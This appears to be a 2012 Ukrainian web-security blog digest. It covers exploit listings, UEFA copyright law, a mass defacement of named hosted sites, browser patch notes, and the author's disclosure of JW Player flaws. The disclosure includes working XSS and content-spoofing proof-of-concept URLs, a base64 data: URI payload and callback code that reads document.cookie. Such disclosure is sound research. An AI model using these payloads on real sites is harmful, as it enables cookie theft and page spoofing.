Websecurity - Веб безпека

В даній добірці експлоіти в веб додатках:

• sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit (деталі)
• Xoops Module Friendfinder <= 3.3 (view.php id) BLIND SQL Injection Exploit (деталі)
• Xoops module Articles <= 1.02 (index.php cat_id) SQL Injection Exploit (деталі)
• Ananta Gazelle SQL Injection Vulnerability (деталі)
• 1024CMS Blind SQL Injection Vulnerability (деталі)

Раніше я розповідав про різні причини, через які в Україні правоохоронні органи можуть закрити веб сайти. В останнє я писав про закриття сайтів через розміщення вірусів. А зараз розповім вам про можливість накладання штрафів та закриття сайтів через закони, які стосуються Євро 2012.

В Україні є законодавство стосовно захисту авторського права, в тому числі авторського права УЄФА. Зокрема є закон “Про авторське право і суміжні права“. Відповідно до цього закону, захист авторського права реалізується шляхом встановленим адміністративним, цивільним та кримінальним законодавством. Відповідно до статті 176 Кримінального кодексу “Порушення авторського права і суміжних прав” можливі штрафи, виправні роботи до 2 років та ув’язнення до 2 років за порушення авторського права. А якщо ці дії зроблені повторно, чи групою осбі, чи призвели до значних збитків, то можливі ще більші штрафи, виправні роботи до 2 років та ув’язнення від 2 до 5 років.

Тому copyright УЄФА захищений в Україні поточними законами. Але уряд вирішив зробити закони більш жорсткими. В березні 2012 уряд створив проект Закону про права інтелектуальної власності та репутацію Об’єднання європейських футбольних асоціацій. Спочатку вони планували підняти штрафи за різні порушення авторського права УЄФА, такі як збільшення ув’язнення до 6 років для користувачів та власників сайті за копіювання футбольних записів та поширення їх в Інтернеті. Але потім уряд відмовися від цих змін і ліше запропонував пришвидшити розгляд копірайтних справ в судах. Цей законопроект ще не прийнятий, але це може бути зроблени найближчим часом.

Є один приклад використання закону про авторське право в контексті Євро 2012. У вересні 2011 правоохронці закрити сайт ProstoPrint та саму компанію в зв’язку з порушенням копірайту УЄФА. Офіційна причина правоохоронців для закриття ProstoPrint була такою, що компані продовала футболки з логотипом УЄФА на своєму сайті. При цьому власник ProstoPrint стверджує, що його онлайн магазин не продавав такі футболки і були виготовлені лише ті 15 футболок, що були замовлені правоохоронцями (для створення легальних причин для їхніх дій). Це приклад зловживання сервісами міліцією, коли вони дозволяють таке зловживання (як сервіси другу по замовленню), щоб змусити їх порушити закон та закрити їх.

Навіть без посилення поточних законів, Українське законодавство про авторське право може бути використане проти веб сайтів та компаній, що його порушують. Особливо це стосується копірайту УЄФА, який активно захищається в зв’язку з Євро 2012. Порушення можуть бути зроблені як власниками сайтів (що розмістять заборонений контент), або користувачами сайтів (що завантажать заборонений контент), або правоохоронцями (що заабюзять сервіс, який дозволяє зловживання, як у вищезгаданому випадку), або в результаті взлому сайта та розміщення на ньому такого контенту.

Тому правоохронці можуть притягти до відовідальності тих, хто незаконно копіює футбольні записи та поширує їх в Інтернеті - за це можуть бути штрафи та ув’язнення. А за розміщення на сайтах банерів з логотипом чемпіонату чи трансляцію матчів в Інтернеті, окрім штрафів власники сайтів можуть залишитися без домена і сервера.

Так що за вчинені умисно чи неумисно вищезгадані дії, в тому числі після взлому сайтів, їх власники підпадуть під порушення законодавства. Тому уразливості на веб сайтах можуть підставити їх під штрафи та закриття через порушення копірайту УЄФА. Дана обставина повина стати приводом для власників веб сайтів для покращення їхньої безпеки.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Uploadify, All-in-One Event Calendar та WPsc-MijnPress. Для котрих з’явилися експлоіти. Uploadify - це плагін для надання можливості завантажувати файли на сайт, All-in-One Event Calendar - це плагін для створення календаря, WPsc-MijnPress - це фреймворк для розробників.

• Reflected XSS in Uploadify Integration Wordpress plugin (деталі)
• Multiple XSS vulnerabilities in All-in-One Event Calendar Plugin for WordPress (деталі)
• Wordpress WPsc-MijnPress plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За період з 24.04.2012 по 28.04.2012 відбувся масовий взлом сайтів на сервері VinNest. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер української компанії VinNest. Взлом складався з серії взломів, які відбулися після згаданого масового взлому сайтів на сервері Cityhost.

Всього було взломано 58 сайтів на сервері української компанії VinNest (IP 193.243.158.18). Це наступні сайти: vinnitskaya-svadba.com.ua, www.kohana-kohaniy.com.ua, chumak.vn.ua, www.djenta.com.ua, drlab.com.ua, jewishtravel.com.ua, vipdom.vn.ua, dad.vn.ua, compquartal.vn.ua, www.vtranspribor.com.ua, www.handbook.com.ua, centershow.com.ua, erunit.com, filin.vn.ua, axioma-cr.vn.ua, bocconcino.com.ua, golos-narodu.com.ua, glycerin.com.ua, edem-agency.com, altecs.com.ua, czechclub.com.ua, aurora-salon.com.ua, 10a.vn.ua, healthslao.com.ua, www.voa.vn.ua, www.vakhovskyy.com.ua, vorota.vn.ua, yursana.com, ukrpain.com.ua, spec.vn.ua, www.t.vn.ua, www.klondikeband.com.ua, roza.vn.ua, www.vininvest.gov.ua, www.vipcard.vn.ua, www.vinnychany.kiev.ua, www.vininfo.vn.ua, tsk-ukraine.com.ua, soloha.vn.ua, www.sobaka.vn.ua, vinrda.gov.ua, ros.ua, www.raduga.vn.ua, pay.bird4.nest.vn.ua, minitv.vn.ua, mashtab.com.ua, www.magicenter.com.ua, www.vintrans.vn.ua, lux.vn.ua, www.planet-m.com.ua, itcentre.net.ua, www.vipmed.vn.ua, www.vin-ocsssdm.com.ua, vitacom.vn.ua, serdechko.bird4.nest.vn.ua, www.vincor.vn.ua, www.vmc.vn.ua, vinoblzem.gov.ua. Серед них українські державні сайти www.vininvest.gov.ua, vinrda.gov.ua та vinoblzem.gov.ua.

З зазначених 58 сайтів 5 сайтів були взломані хакером Dj_Taleh, 1 сайт хакерами з TOP-TEAM та 52 сайти були взломані хакером TURK KURSUNU.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх 52 сайтів, немає сумнівів, що вони були взломані TURK KURSUNU через взлом серверу хостінг провайдера (всі інші дефейси проводилися під час взломів окремих сайтів). Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

В даній добірці уразливості в веб додатках:

• Polycom Web Management Interface O.S. Command Injection (деталі)
• CitrusDB 2.4.1 - LFI/SQLi Vulnerability (деталі)
• Multiple Vulnerabilities in OpenCart 1.5.2.1 (деталі)
• Apache Hadoop user impersonation vulnerability (деталі)
• PHPNuke Module’s Name Download SQL Injection Vulnerabilities (деталі)
• Path Traversal on Polycom Web Management Interface (деталі)
• Matterdaddy Market v1.1 - SQL Injection Vulnerabilities (деталі)
• GroupWare epesiBIM CRM 1.2.1 - Multiple Web Vulnerabilities (деталі)
• online newspaper university “newsdesc.php” SQL Injection Vulnerabilities (деталі)
• Local File Inclusion in Invision Power Board 3.3.0 (деталі)

Учора, 05.06.2012, вийшов Mozilla Firefox 13. Нова версія браузера вийшла через півтора місяця після виходу Firefox 12.

Mozilla офіційно представила реліз веб-браузера Firefox 13. Крім того, випущений коригувальний реліз гілки з тривалим терміном підтримки - Firefox 10.0.5. Реліз Firefox 14 очікується в середині липня, а Firefox 15 вийде в кінці серпня.

Також були випущені Thunderbird 13.0 і Seamonkey 2.10, а найближчим часом вийде нова версія Firefox for Android.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 13.0 усунуто сім уразливостей, серед яких присутні чотири проблеми, що мають критичний ступінь небезпеки, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок.

• Релиз web-браузера Firefox 13 (деталі)

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey

Уразливі продукти: Mozilla Firefox 12.0, Firefox ESR 10.0, Thunderbird 12.0, Thunderbird ESR 10.0, SeaMonkey 2.9.

Численні пошкодження пам’яті в основному коді і різних бібліотеках, міжсайтовий скриптінг, витік інформації.

• Mozilla Foundation Security Advisory 2012-20 (деталі)
• Mozilla Foundation Security Advisory 2012-21 (деталі)
• Mozilla Foundation Security Advisory 2012-22 (деталі)
• Mozilla Foundation Security Advisory 2012-23 (деталі)
• Mozilla Foundation Security Advisory 2012-24 (деталі)
• Mozilla Foundation Security Advisory 2012-25 (деталі)
• Mozilla Foundation Security Advisory 2012-26 (деталі)
• Mozilla Foundation Security Advisory 2012-27 (деталі)
• Mozilla Foundation Security Advisory 2012-28 (деталі)
• Mozilla Foundation Security Advisory 2012-29 (деталі)
• Mozilla Foundation Security Advisory 2012-30 (деталі)
• Mozilla Foundation Security Advisory 2012-31 (деталі)
• Mozilla Foundation Security Advisory 2012-32 (деталі)
• Mozilla Foundation Security Advisory 2012-33 (деталі)

28.05.2012

У травні, 25.05.2012, під час пентесту, я виявив Content Spoofing та Cross-Site Scripting уразливості в JW Player. Про деякі з цих CS уразливостей мені відомо ще з 2008 року, коли вперше зіштовхнувся з цим відеоплеєром на флеші. Про що найближчим часом повідомлю розробникам флеш додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

06.06.2012

Content Spoofing:

В параметрі file можна вказати як відео, так і аудіо файли.

Можна вказувати абсолютні URL (в параметрах file та image) для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/jwplayer.swf?file=1.flv&image=1.jpg

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі config) для включення зовнішніх файлів в флешку на цільовому сайті (параметри file та image в xml-файлі приймають довільні адреси). Для завантаження файла конфігурації з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL (в параметрі playlistfile) для включення зовнішніх файлів в флешку на цільовому сайті (параметри media:content та media:thumbnail в xml-файлі приймають довільні адреси). Для завантаження файла плейліста з зовнішнього сайта він повинен мати crossdomain.xml.

http://site/jwplayer.swf?playlistfile=1.rss
http://site/jwplayer.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>

XSS:

http://site/jwplayer.swf?playerready=alert(document.cookie)

XSS:

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

В ліцензійних версіях плеєра є така функція, як логотип. Тому в ліцензійних версіях swf-файла також є наступні уразливості.

Content Spoofing:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua

XSS:

http://site/jwplayer.swf?file=1.flv&logo.file=1.jpg&logo.link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі JW Player 5.9.2156 та попередні версії. А також всі веб додатки, що використовують дані версії JW Player, а це сотні веб додатків та мільйони сайтів в Інтернеті. Перша з наведених XSS уразливостей вже виправлена в версії 5.9.2206 (інші уразливості розробники планують виправити в наступній 6.0 версії). Лише деякі з цих уразливостей наявні в 3.x та попередніх версіях.

Swf-файли JW Player можуть мати різні імена, такі як jwplayer.swf та player.swf. За інформацією Google, існує близько 7709600 таких flash файлів в Інтернеті.

P.S.

Виправив код XSS в ліцензійний версії плеєра. Замість javascript: URI потрібно використовувати data: URI (перший варіант спрацьовував лише в старих версіях плеєра).

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://masterphone.com.ua - інфекція була виявлена 27.03.2012. Зараз сайт не входить до переліку підозрілих.
• http://litech.net - інфекція була виявлена 25.04.2012. Зараз сайт не входить до переліку підозрілих.
• http://valki.ucoz.ua - інфекція була виявлена 28.03.2012. Зараз сайт не входить до переліку підозрілих.
• http://masofrt.pl.ua - інфекція була виявлена 28.03.2012. Зараз сайт не входить до переліку підозрілих.
• http://priroda.com.ua - інфекція була виявлена 26.04.2012. Зараз сайт не входить до переліку підозрілих.

У травні, 15.05.2012, через півтора місяці після виходу Google Chrome 18, вийшов Google Chrome 19.

В браузері зроблено ряд нововведень. А також виправлено 20 уразливостей, з яких 8 позначені як небезпечні, 7 - помірні і 5 - незначні. Чимало з виправлених уразливостей виявлені за допомогою інструментарію address-sanitizer, призначеного для автоматизованого визначення фактів звертання до звільнених областей пам’яті, виходу за межі границь виділеного буфера і деяких інших типів помилок при роботі з пам’яттю.

Серед небезпечних уразливостей: звертання до вже звільненої пам’яті через маніпуляції з елементом style, через API Indexed DB, при обробці таблиць і PDF-файлів, некоректний запис даних у реалізації регулярних виразів движка v8, запис за границі буфера при роботі OGG-контейнерів, вихід за границі буфера в PDF-переглядачі. Окремо відзначені уразливості, що проявляються через проблеми в сторонніх компонентах: уразливість через помилку в Linux-драйвері для відеокарт NVIDIA і вихід за границі буфера в libxml.

• Релиз web-браузера Chrome 19 (деталі)